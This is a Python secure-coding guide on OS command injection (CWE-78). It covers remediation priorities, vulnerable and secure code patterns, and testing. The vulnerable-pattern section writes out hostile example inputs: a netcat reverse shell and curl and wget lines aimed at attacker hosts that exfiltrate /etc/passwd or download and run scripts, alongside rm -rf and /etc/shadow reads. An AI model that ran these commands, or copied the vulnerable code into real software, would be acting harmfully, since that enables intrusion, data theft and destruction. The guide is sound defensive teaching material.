CWE-78: OS Command Injection - Python
Overview
OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.
Primary Defence: Use Python standard-library modules or maintained Python packages (pathlib, shutil, requests, zipfile, etc.) instead of system commands, or if unavoidable, use subprocess.run() with argument lists and shell=False. Avoid launching shell scripts or batch files with untrusted arguments; platform-specific shell parsing can reappear even when your Python code does not explicitly request a shell.
Remediation Strategy
PRIMARY FIX - Avoid System Calls
Use Python native libraries instead of executing commands
- This eliminates the vulnerability entirely
- Do NOT use subprocess or os.system() if a Python library exists
SECONDARY FIX - Use subprocess.run() with Argument List
Set shell=False, pass arguments as list
- WARNING: Only use if Priority 1 is not possible
- Must use a list of arguments with shell=False (CRITICAL)
Defense in Depth - Input Validation
Allowlist permitted characters
- Required in addition to Priority 1 or 2
- Never use validation alone
Additional Hardening - Least Privilege
Drop privileges, use resource limits
- Apply alongside other fixes
Decision Tree
Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, shutil, requests, etc.)
│ ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│ └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│ ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│ └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
   ├─ Add input validation (Priority 3)
   └─ Apply least privilege (Priority 4)
Common Vulnerable Patterns
String Concatenation with os.system()
# VULNERABLE - Command injection via string concatenation
filename = request.GET['file']
os.system('ls -la ' + filename)
# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp
Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.
Using subprocess with shell=True
# VULNERABLE - Shell command injection
user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)
# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file
subprocess.Popen with Shell Invocation
# VULNERABLE - Invoking shell allows command injection
ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)
# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands
Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.
Unvalidated Input in subprocess.call()
# VULNERABLE - No input validation with shell=True
user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)
# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh"
# Result: Downloads and executes malware
Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.
Secure Patterns
Use Python Native Libraries (PREFERRED - Eliminates Command Injection)
# SECURE - Use pathlib and os modules instead of OS commands
from pathlib import Path
import os
directory = Path('/uploads')
for file_path in directory.iterdir():
    stat = file_path.stat()
    print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")
# More file operations
import shutil
content = Path(filepath).read_text() # Instead of "cat"
shutil.copy(source, dest) # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True) # Instead of "mkdir -p"
Path(filepath).unlink() # Instead of "rm"
Why this works: Python's pathlib and shutil modules operate directly on the filesystem through the Python runtime without invoking shell commands. This completely eliminates command injection vulnerabilities - there's no OS process to execute, no shell to interpret metacharacters like ;, |, or &&, and no possibility of command chaining. These functions are also more portable across operating systems than system commands.
Use requests Library for Network Operations
# SECURE - Use requests instead of wget/curl commands
import requests
response = requests.get(url, timeout=30)
content = response.content
# For downloads
with requests.get(url, stream=True, timeout=30) as r:
    r.raise_for_status()
    with open('download.file', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)
Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.
Use tarfile/zipfile for Archives
# SECURE - Use tarfile extraction filters instead of tar commands
import tarfile
from pathlib import Path
with tarfile.open(archive, 'r:gz') as tar:
    # Python 3.12+ (extraction filters were also backported to security
    # releases of 3.8 through 3.11): the data filter blocks absolute paths,
    # outside-destination paths, dangerous links, and special files.
    tar.extractall(path='./extracted', filter='data')
# For ZIP files
import zipfile
from pathlib import Path
destination = Path('./extracted').resolve()
with zipfile.ZipFile(archive, 'r') as zip_ref:
    for member in zip_ref.namelist():
        target = (destination / member).resolve()
        if not target.is_relative_to(destination):
            raise ValueError(f'Unsafe archive member: {member}')
        if Path(member).is_absolute():
            raise ValueError(f'Unsafe archive member: {member}')
    zip_ref.extractall(destination)
Why this works: Python's tarfile and zipfile modules handle archive operations without calling external tar, unzip, or 7z commands, so archive names cannot become shell syntax. For tar archives, Python 3.12+ extraction filters provide the important safety boundary: filter='data' rejects absolute paths, entries that would extract outside the destination, dangerous hardlinks/symlinks, and special files. For zip archives, resolving each destination path and checking is_relative_to(destination) prevents zip-slip traversal even when paths contain nested .. components. These archive checks address filesystem escape risks; they are separate from command injection prevention.
For older Python versions without tar extraction filters, do not extract untrusted tar files unless you implement equivalent checks for paths, links, special files, file count, and extracted size. Even with filter='data', extract untrusted archives into a new temporary directory and apply resource limits to reduce denial-of-service risk.
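The path, file-count, and extracted-size checks described above can be sketched for zip archives as follows. This is a minimal illustration, not a complete extractor: the helper names (unsafe_zip_members, build_zip) and both limits are assumptions chosen for the example, and the size check relies on the sizes declared in the archive headers.

```python
import io
import tempfile
import zipfile
from pathlib import Path

MAX_MEMBERS = 1000                   # assumed limit; tune per application
MAX_TOTAL_BYTES = 100 * 1024 * 1024  # assumed cap on declared uncompressed size

def unsafe_zip_members(zip_file, destination):
    """Return names of members that would land outside destination.

    Raises ValueError when the archive exceeds the assumed count or size limits.
    """
    destination = Path(destination).resolve()
    infos = zip_file.infolist()
    if len(infos) > MAX_MEMBERS:
        raise ValueError("Too many archive members")
    if sum(info.file_size for info in infos) > MAX_TOTAL_BYTES:
        raise ValueError("Archive expands beyond the size limit")
    return [
        info.filename
        for info in infos
        if not (destination / info.filename).resolve().is_relative_to(destination)
    ]

def build_zip(names):
    """Build an in-memory archive for the demonstration below."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as zf:
        for name in names:
            zf.writestr(name, b"data")
    buffer.seek(0)
    return zipfile.ZipFile(buffer)

with tempfile.TemporaryDirectory() as dest:
    clean = unsafe_zip_members(build_zip(["ok.txt", "docs/readme.txt"]), dest)
    hostile = unsafe_zip_members(build_zip(["ok.txt", "../evil.txt"]), dest)
```

A caller would refuse to extract whenever the returned list is non-empty, and would still extract into a fresh temporary directory as recommended above.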
Use re Module for Text Processing
# SECURE - Use re module instead of grep commands
import re
from pathlib import Path
content = Path(filepath).read_text()
matches = re.findall(pattern, content)
# Line-by-line processing
with open(filepath) as f:
    matching_lines = [line for line in f if search_term in line]
Why this works: Python's re module and file I/O operations provide powerful text processing capabilities without executing grep, sed, awk, or other shell utilities. Processing text in-memory through Python prevents command injection while offering better performance, type safety, and cross-platform compatibility. List comprehensions and regex operations are also more maintainable than complex shell pipelines.
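When the search text itself comes from a user, it may be worth treating it as literal text rather than as a regular expression, so that characters such as . or * keep their plain meaning. The sketch below shows one way to do that with re.escape; grep_literal and the sample log contents are hypothetical names and data used only for illustration.

```python
import re
import tempfile
from pathlib import Path

def grep_literal(filepath, search_term, ignore_case=False):
    """Return the lines of filepath that contain search_term as literal text."""
    flags = re.IGNORECASE if ignore_case else 0
    # re.escape neutralises regex metacharacters in the user-supplied term
    pattern = re.compile(re.escape(search_term), flags)
    with open(filepath, encoding="utf-8", errors="replace") as f:
        return [line.rstrip("\n") for line in f if pattern.search(line)]

with tempfile.TemporaryDirectory() as tmp:
    log = Path(tmp) / "app.log"
    log.write_text("GET /a.b\nGET /aXb\nPOST /a.b?x=1\n", encoding="utf-8")
    # An unescaped pattern "a.b" would also match "aXb"; the literal search does not
    hits = grep_literal(log, "a.b")
```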
subprocess.run() with Argument List (If Process Execution Required)
WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.
# USE WITH CAUTION - When process execution is unavoidable, use argument list
import subprocess
import ipaddress
ip_address = request.GET['ip']
# Validate input first
try:
    ipaddress.ip_address(ip_address)
except ValueError:
    raise ValueError('Invalid IP address')
# Use list of arguments - NO SHELL
result = subprocess.run(
    ['ping', '-c', '4', ip_address],  # Arguments as list
    capture_output=True,
    text=True,
    shell=False,  # CRITICAL: shell=False
    timeout=10
)
print(result.stdout)
Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without Python invoking /bin/sh or cmd.exe. Even if ip_address contains shell metacharacters like ; or &&, they are treated as literal argument data rather than command separators. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess. On Windows, avoid launching .bat or .cmd files with untrusted arguments; Python documents platform-specific cases where batch files may still be processed by a system shell.
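The literal-argument behavior can be observed directly. In this small sketch, a child Python process simply prints the arguments it received; echo_args is a hypothetical helper, and the current interpreter is used as the child so the example does not depend on any external binary.

```python
import subprocess
import sys

def echo_args(*user_args):
    """Run a child Python process that prints the arguments it received."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1:])", *user_args],
        capture_output=True,
        text=True,
        shell=False,  # no shell ever parses the argument list
        timeout=10,
        check=True,
    )
    return result.stdout.strip()

payload = "8.8.8.8; echo INJECTED"
# The child sees one argument containing the ';' as ordinary text
received = echo_args(payload)
```

The payload arrives as a single list element, so the text after the semicolon is never run as a second command. The receiving program can still interpret the value in its own way, which is why validation remains necessary.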
subprocess.run() with Path Validation (For File Operations)
WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).
For file operations requiring subprocess - always validate paths.
# AVOID IF POSSIBLE - Validate paths before use
import re
from pathlib import Path
filename = request.GET['file']
# Validate filename (fullmatch: '$' with re.match would accept a trailing newline)
if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
    raise ValueError('Invalid filename')
# Better: Use pathlib instead of subprocess
base_dir = Path('/uploads').resolve()
file_path = (base_dir / filename).resolve()
if not file_path.is_relative_to(base_dir):
    raise ValueError('Path traversal detected')
content = file_path.read_text()
Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.
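The two checks can be combined into one reusable helper. The sketch below is one possible shape, assuming Python 3.9+ for is_relative_to; resolve_upload is a hypothetical name, and the extra rejection of names starting with a dash is an added assumption to reduce argument-injection risk if the path is later passed to a program.

```python
import re
import tempfile
from pathlib import Path

FILENAME_RE = re.compile(r"[A-Za-z0-9._-]+")

def resolve_upload(base_dir, filename):
    """Return a path strictly inside base_dir for filename, or raise ValueError."""
    # fullmatch avoids the trailing-newline quirk of '$' with re.match
    if not FILENAME_RE.fullmatch(filename) or filename.startswith("-"):
        raise ValueError("Invalid filename")
    base = Path(base_dir).resolve()
    candidate = (base / filename).resolve()
    # Reject the base directory itself and anything outside it
    if candidate == base or not candidate.is_relative_to(base):
        raise ValueError("Path traversal detected")
    return candidate

with tempfile.TemporaryDirectory() as tmp:
    ok = resolve_upload(tmp, "report.txt")
    rejected = []
    for bad in ["..", ".", "../etc/passwd", "report.txt\n", "-rf"]:
        try:
            resolve_upload(tmp, bad)
        except ValueError:
            rejected.append(bad)
```

Note that ".." passes the character allowlist on its own, so the resolved-path comparison is what actually stops it.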
Input Validation (Defense in Depth)
Allowlist Validation
import ipaddress
import re
def validate_filename(filename):
    """Only allow alphanumeric, underscore, dash, dot"""
    # fullmatch rejects a trailing newline that '$' with re.match would accept
    if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
        raise ValueError('Invalid filename characters')
    return filename
def validate_ip_address(ip):
    """Validate IPv4 format"""
    try:
        ipaddress.IPv4Address(ip)
        return ip
    except ValueError:
        raise ValueError('Invalid IP address')
Framework-Specific Guidance
Django/Flask Integration
# Django view with validation
import ipaddress
import subprocess
from django.http import HttpResponse, HttpResponseBadRequest
def ping_view(request):
    ip_address = request.GET.get('ip', '')
    try:
        ipaddress.ip_address(ip_address)
    except ValueError:
        return HttpResponseBadRequest('Invalid IP')
    # Safe to use with subprocess
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging the request
    )
    return HttpResponse(result.stdout)
shlex for Argument Parsing (Use Carefully)
import shlex
import subprocess
# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template
cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip) # Append validated user input
subprocess.run(args, shell=False)
# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input) # Still vulnerable!
# subprocess.run(args, shell=False)
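To make the risk concrete, the following sketch compares splitting attacker-controlled text with keeping it as a single argument. The input string is a hypothetical attacker value; nothing is executed here, only the resulting argument lists are built.

```python
import shlex

trusted_prefix = shlex.split("ping -c 4")  # trusted command template
untrusted = "8.8.8.8 -f -s 65000"          # hypothetical attacker-controlled value

# Unsafe: splitting the untrusted text lets it contribute extra flags
unsafe_args = trusted_prefix + shlex.split(untrusted)

# Safer: the untrusted value stays one argument (it should still be validated)
single_arg = trusted_prefix + [untrusted]
```

No shell is involved in either case, yet the first list carries three attacker-chosen extra arguments. This is argument injection rather than shell injection, and shell=False alone does not prevent it.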
Security Best Practices
Use Timeout
try:
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging
    )
except subprocess.TimeoutExpired:
    # Handle timeout
    pass
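A runnable variant of the timeout pattern, as a rough sketch: run_with_timeout is a hypothetical wrapper, and the slow and fast commands use the current interpreter as a stand-in for a real external tool.

```python
import subprocess
import sys

def run_with_timeout(args, seconds):
    """Return (completed, stdout); completed is False when the timeout is hit."""
    try:
        result = subprocess.run(
            args,
            capture_output=True,
            text=True,
            shell=False,
            timeout=seconds,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run() kills the child before raising TimeoutExpired
        return False, ""
    return True, result.stdout

slow = [sys.executable, "-c", "import time; time.sleep(5)"]
fast = [sys.executable, "-c", "print('done')"]
```

Returning a flag instead of silently passing lets the caller turn a timeout into a controlled error response.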
Limit Resource Usage
import resource
import subprocess
def limit_process_resources():
    """Limit CPU and memory for subprocess"""
    def set_limits():
        # Limit CPU time to 30 seconds
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
        # Limit memory to 128MB
        resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024,
                                                128 * 1024 * 1024))
    return set_limits
# Use preexec_fn only in simple Unix subprocess launchers.
# In threaded web applications, prefer OS/container/cgroup limits or a worker wrapper.
subprocess.run(
    ['ping', '-c', '4', ip_address],
    preexec_fn=limit_process_resources(),
    shell=False
)
Drop Privileges (Unix)
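import os
import pwd
import subprocess
def drop_privileges(username='nobody'):
    """Drop privileges to specified user"""
    # Look up the account before forking so the child does as little work as possible
    pw_record = pwd.getpwnam(username)
    def set_user():
        os.setgroups([])  # Drop supplementary groups first
        os.setgid(pw_record.pw_gid)
        os.setuid(pw_record.pw_uid)
    return set_user
# Run subprocess as unprivileged user (the parent must have permission to switch users)
# Python 3.9+ also accepts user=, group=, and extra_groups= on subprocess.run()
subprocess.run(
    ['command'],
    preexec_fn=drop_privileges('nobody'),
    shell=False
)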
Deprecated/Dangerous Functions to Avoid
# NEVER USE THESE:
os.system(cmd) # Always uses shell
os.popen(cmd) # Uses shell; prefer subprocess without shell
commands.getoutput(cmd) # Removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)
# ALWAYS USE:
subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)
Remediation Steps
- Locate each command sink: os.system(), os.popen(), subprocess.* with shell=True, string commands passed to subprocess, or wrappers that call these APIs.
- Identify the operation being performed and replace it with a Python API when one exists, such as pathlib, shutil, zipfile, tarfile, re, or a maintained network library.
- If process execution is unavoidable, pass an argument list with shell=False, set a timeout, and avoid batch or shell scripts for untrusted arguments.
- Validate each argument using a type-specific parser such as ipaddress, Path resolution within an allowlisted base directory, or an allowlist for simple filenames.
- Remove fallback paths that still construct command strings, including debug/admin paths and error-handling branches.
- Add operational hardening such as low-privilege users, container or OS resource limits, controlled working directories, and restricted environment variables.
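Several of these steps can be gathered into a single launcher so that every call site goes through the same checks. The sketch below is one possible shape under stated assumptions: run_tool, minimal_env, and the ALLOWED_ENV allowlist are hypothetical names and values, and a real deployment would add argument validation specific to the tool being called.

```python
import os
import subprocess
import sys
import tempfile

ALLOWED_ENV = ("PATH", "LANG", "SYSTEMROOT")  # assumed allowlist of variables

def minimal_env(source=None):
    """Copy only allowlisted variables from source (defaults to os.environ)."""
    source = os.environ if source is None else source
    return {key: source[key] for key in ALLOWED_ENV if key in source}

def run_tool(args, timeout=10):
    """Run an argument list without a shell, in a scratch working directory."""
    if isinstance(args, (str, bytes)):
        raise TypeError("args must be a list of strings, not a command string")
    args = list(args)
    if not all(isinstance(a, str) for a in args):
        raise TypeError("every argument must be a string")
    with tempfile.TemporaryDirectory() as workdir:
        return subprocess.run(
            args,
            capture_output=True,
            text=True,
            shell=False,
            timeout=timeout,
            cwd=workdir,        # controlled working directory
            env=minimal_env(),  # restricted environment variables
        )

result = run_tool([sys.executable, "-c", "print('ok')"])
```

Rejecting plain strings at the boundary makes it harder for a later change to reintroduce a concatenated command line.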
Testing
- Test normal values for each argument, including valid filenames, paths, IP addresses, and URLs expected by the feature.
- Test shell metacharacters such as ;, &&, |, backticks, $(), redirects, quotes, and newlines.
- Test argument injection values such as filenames beginning with - or values that could become extra flags.
- Test Windows and Unix behavior separately when the application is cross-platform, especially for .bat or .cmd launchers.
- Verify invalid input fails before subprocess execution and returns a controlled error.
- Re-run static analysis tools such as Bandit and add regression tests around the wrapper or service function that launches processes.
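A regression test for a validator might look like the sketch below. It uses unittest from the standard library; the validator is a local stand-in written for this example (an allowlist with an added leading-dash check), and the payload list is illustrative rather than exhaustive.

```python
import re
import unittest

def validate_filename(filename):
    """Stand-in allowlist validator used only by this test sketch."""
    if not re.fullmatch(r"[A-Za-z0-9._-]+", filename) or filename.startswith("-"):
        raise ValueError("Invalid filename characters")
    return filename

INJECTION_PAYLOADS = [
    "file.txt; rm -rf /tmp/x",  # command separator
    "file.txt && id",           # conditional chaining
    "file.txt | cat",           # pipe
    "`id`",                     # backticks
    "$(id)",                    # command substitution
    "file.txt > out",           # redirect
    "'quoted'",                 # quotes
    "file.txt\nid",             # embedded newline
    "file.txt\n",               # trailing newline
    "-rf",                      # argument injection
]

class ValidateFilenameTests(unittest.TestCase):
    def test_accepts_plain_names(self):
        for name in ["report.txt", "data_2024-01.csv"]:
            self.assertEqual(validate_filename(name), name)

    def test_rejects_payloads(self):
        for payload in INJECTION_PAYLOADS:
            with self.subTest(payload=payload):
                with self.assertRaises(ValueError):
                    validate_filename(payload)
```

The class can be run with python -m unittest, or collected by pytest, alongside tests for the function that actually launches the process.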
Common Pitfalls
- Passing a list to subprocess.run() but also setting shell=True.
- Using shlex.split() on untrusted user input and treating the result as safe.
- Validating with a denylist of shell metacharacters while still invoking a shell.
- Using regex-only IP validation that accepts invalid addresses; use ipaddress for IP values.
- Replacing a command injection bug with path traversal by passing unvalidated filenames into file operations.
- Relying on timeouts, dropped privileges, or resource limits as the primary fix instead of removing shell interpretation.
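The regex-versus-ipaddress pitfall is easy to reproduce. In this sketch, NAIVE_IP_RE is a hypothetical example of the kind of pattern often seen in the wild, and is_valid_ip is a thin wrapper around the standard-library parser.

```python
import ipaddress
import re

# Hypothetical weak check: only tests the dotted-digit shape
NAIVE_IP_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def is_valid_ip(value):
    """Return True only if value parses as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True

# The regex accepts out-of-range octets and a trailing newline
naive_accepts_range = bool(NAIVE_IP_RE.match("999.999.999.999"))
naive_accepts_newline = bool(NAIVE_IP_RE.match("8.8.8.8\n"))
```

The parser rejects both of those values while still accepting well-formed IPv4 and IPv6 addresses.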
Dependencies and Installation
- pathlib, shutil, subprocess, zipfile, tarfile, ipaddress, and re are in the Python standard library.
- requests is a third-party package for HTTP operations; keep it current through the project's dependency manager.
- Bandit can help detect dangerous subprocess patterns, but manual review is still needed to confirm whether data is untrusted and whether shell=True or string commands are reachable.